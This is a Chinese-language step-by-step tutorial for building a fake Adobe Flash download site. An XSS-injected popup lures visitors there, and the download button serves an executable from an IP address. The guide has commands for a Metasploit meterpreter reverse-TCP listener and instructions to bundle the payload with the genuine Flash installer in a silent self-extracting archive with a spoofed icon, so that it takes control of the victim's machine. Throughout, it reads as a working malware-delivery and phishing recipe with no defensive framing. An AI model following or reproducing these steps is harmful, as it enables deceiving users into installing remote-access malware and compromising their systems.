1.在本机phpstudy中开启web服务
2.下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问..
https://github.com/r00tSe7en/Fake-flash.cn #
旧版
https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash #
新版
修改index.html
<div id="ic-download">
<span>
⽴即下载
</span>
<a href="http://101.42.118.221/test.exe" target="_self">
⽴即下载
</a>
</div> //
点击以下⻚⾯中的
"
⽴即下载
"
会将如上的
test.exe
下载到本地!
3.来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹
站的根⽬录下⾯


4.
修改js中的这⼀⾏代码,改成我们伪造的flash⽹站(本机IP)

5.
进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个⽊
⻢
使用kali的MSF生成Payload,在桌面上生成shell.exe文件
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

6.将官网下载的flash安装包和本地的shell.exe打包压缩文件名为“xxx.exe”,点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp
7.点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"
C:\Windows\Temp\shell.exe
C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe


8.在更新下选择解压并更新文件和覆盖所有文件

9.使⽤ ResourceHacker 修改图标,下载安装;通过ResourceHacker打开原版的flash安
装程序,点击
Icon Group
⽂件夹中的⽂件,⿏标右键"保存*.ico资源",即可导出ico图标

点击第一行,保存flash图标文件,再将压缩包拖入点击Replace,选择保存的图标文件进行替换

10.
模拟受害者的流程 最终获取到受害者⽹站控制权
